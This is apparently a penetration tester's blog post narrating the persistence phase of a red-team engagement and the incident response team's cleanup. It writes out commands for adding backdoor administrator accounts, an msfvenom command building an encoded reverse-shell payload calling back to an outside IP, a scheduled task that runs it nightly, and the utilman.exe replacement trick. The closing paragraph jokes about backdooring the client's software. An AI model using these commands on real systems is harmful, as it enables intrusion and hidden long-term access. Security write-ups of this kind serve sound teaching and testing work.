Home is Where I Upload my Tools - Analyzing Persistence Tactics
In our last phase we were able to escalate our privileges to that of the domain administrator. The next step is to persist on the network by embedding ourselves so deep into the system they have to burn us out with thermate (seriously it’s real). This is an important step when you have a blue team that actually does their job and just because you’ve never run into that unicorn (seriously, it's not real) doesn’t mean you can get complacent.
The goal of this phase is to create multiple fallback points so that if one or more are burned by the blue team we still have access to the network. It is important to diversify our persistence points on the network using multiple methods. There are brute force methods and stealth methods that we will use to ensure our access is not interrupted.
Status of Forces
The current status of forces stands that blue forces have an active presence on a textbook network with a DMZ and internal network. The red team has gained access to the internal network, compromised domain administrator credentials and used them to create a domain administrator account of their own. The blue team has recently reset all local administrator accounts and removed our scanner that was inside the DMZ. Our pivot into the network is safe and sound on the DNS server and has not attracted any attention because the server fell off the domain long ago and has not been properly maintained or updated with anti-virus signatures.
Initial Tactical Engagement
We begin by articulating our plan to the team so that no one screws up and burns our last grasp on the network. We will start by creating several domain user accounts, a backup domain administrator account, and some local administrator accounts across the network. We will then install several remote access tools across the network that call back to us through the firewall. We will also use some classic persistence methods like replacing windows utilities with command prompts. There are a few persistence methods we shy away from because this test has already been destructive enough. We will refrain from putting a web shell on their front facing web server even though it would be super convenient for us. Rootkits, virtual machines running on workstations, and workstations running on hypervisors are all really nice but time consuming and we can only bill so many hours for this assessment.
The day starts out easy, we move throughout the network with our domain administrator account adding several local administrator accounts on random workstations ‘net user pentest hack3rsinmynetwork! /add ; net localgroup administrators pentest /add’. Next, we log into the domain controller with our domain administrator account. Its all GUI from here, we are going full Jurassic Park on this network, flying through file directories and double clicking all the way; none of that fancy command line kung fu. We open up server manager like a plebian enterprise manager and then active directory users and computers. Right click on the folder we want to place our users and wham baam boozle, we’ve got three regular domain users and a backup domain administrator in case things go awry. We are professionals and emulated the user account naming policies and even placed them in the correct active directory groups instead of top level. Pro tip: If you don’t leave all your tools in c:\tmp, are you even 1337?
Remote access tools are incredibly useful if you can get your hands on one or even program one. We are going to start off simply by creating a meterpreter payload with a calc.exe template and encoding because we know the host network has anti-virus installed, so…
‘msfvenom --payload windows/meterpreter/reverse_tcp lhost=18.104.22.168 lport=80 -e x86/shikata_ga_nai -i 3 -x ./calc.exe -f exe -o definately_not_a_backdoor.exe’.
We will upload this to the domain controller and set it as a scheduled task with…
‘$trigger = new-scheduledtasktrigger -daily -at 1am; $action = new-scheduledtaskaction -execute “definitely_not_a_backdoor.exe”; $principal = New-ScheduledTaskPrincipal -userid "\pentest" -runlevel highest; $settings = New-ScheduledTaskSettingsSet; $newtask = new-scheduledtask -Action $action -principal $principal -trigger $trigger -settings $settings; register-scheduledtask backdoor -inputobject $newtask’.
This will give us a fresh meterpreter session every night at 1 AM.
In our drive for persistence across the network we will access several workstations and servers across the network and replace the ease of access tools, c:\windows\system32\utilman.exe, with a command prompt. By renaming the ease of access tools (always rename it to utilman.exe.bkp so you can clean up after yourself) and copying a command prompt to the same location as the tools, we are able to remote into any computer and at the logon screen click the ease of access tools button to have a system prompt given to us (https://laconicwolf.com/2016/02/25/the-sethc-backdoor/). This trick can also be used to recover the locked-out computers of friends and relatives during the holidays when you are conscripted as the family’s tech support.
The most important part of the persistence phase is to remember to keep a list of the methods and places you used them so that you can clean up after yourself once the assessment has ended. Lord knows the blue team is not going to implement changes outlined in your report that would render your persistence methods ineffective. Always assume the worst of the blue team and you will never be surprised.
Adversary Counter Response
The blue team thinks they are doing a bang-up job at this point. They’ve successfully scrubbed the network of our presence multiple times and cleaned up several intrusions. We’ve managed to slip by undetected up until this point and we are currently living off the land. By living off the land, we mean that we are using legitimate network accounts and legitimate commands to make configuration changes to the network. Generally speaking, if you’ve made it this far, very few blue teams are equipped and knowledgeable enough to stop you. Congratulations, you win … but, we will go over some adversary counter actions that may catch you up at this point just in case the blue team decides to hire an incident response team to come in and use all their fresh brainpower than hasn’t grown stale in the basement of this corporation.
The incident response team are the heavies in the war on hackers. They are what the blue team aspire to be in the climb up the corporate ladder. They are only dispatched when the blue team has failed so miserably that it becomes apparent to management and we all know how blue teams like to sweep their incompetence under the rugs (if you haven’t guessed by now I’m a little hard on blue teams). The incident responders roll in with their kit and set up shop. The first thing they do is analyze network traffic looking for suspicious callouts. One of the first things they notice is that a computer is calling out to a website at 1 am every morning. This alerts them that this computer is compromised. As they investigate it, they are able to look through the common persistence indicators and find that we’ve scheduled a task to execute at that time. It is cleaned along with the backdoor program.
The incident responders realize that a domain controller was compromised and whip their massive unit out on the table and demand that the blue team implement account resets for everyone on the network. The blue team manager tells the incident response team to fuck right off, doing that a couple days ago nearly cost him his job. There is hostility in the air and we now have a pissing contest between middle managers. After a bunch of dick swinging, the blue team agrees to reset the passwords of all the domain administrators and allow the domain users to remain compromised by the penetration testers rather than going through the pain of telling the CEO that more account resets are required. It is at this point that the incident responders pull out their greatest tool yet, an excel spreadsheet where they check off that every domain administrator has reset their password manually. Soon they get to an account that does not have a response from a domain administrator in the room. They disable the account and shake their head at the blue team.
The incident response team wraps up their investigation and collaboration with the ungrateful blue team they just upstaged. Lucky for us this disfunction pushed the heavy hitters off the network before they discovered our other two forms of persistence on the network, local administrator accounts and utilman.exe replacement.
During the debrief we discuss the removal of the domain administrator accounts and the loss of the backdoor on the domain controller. We explore the options of why they were removed and how to avoid it in the future. We plan on only accessing the network during business hours in the future. Additionally, we can focus our efforts on compromising known good accounts and keeping their passwords the same. We will focus on exploiting domain administrator workstations and pulling cleartext passwords out of memory with mimikatz in the future. This way, we will have access to domain administrator accounts and obvious fake accounts will not stand out on a list of domain administrators.
The planning begins for the effects phase. How are we going to use all of this beautiful access to make a living hell for our customer and ensure that we are brought back year after year. Will we set a rule to Cc the CEO’s wife on all the steamy emails he sends to his secretary or will we put backdoors into the software the company is developing? Tune in next time to see the thrilling conclusion of our assessment, the effects phase.